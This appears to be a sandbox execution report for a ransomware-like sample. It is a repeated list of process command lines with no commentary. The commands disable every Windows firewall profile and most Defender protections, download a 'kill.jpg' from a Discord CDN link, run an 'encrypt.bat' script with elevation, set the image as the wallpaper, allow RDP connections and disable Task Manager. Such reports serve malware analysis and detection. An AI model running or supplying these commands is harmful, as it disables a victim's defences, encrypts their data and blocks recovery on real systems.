C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

Network

Country Destination Domain Proto

Files
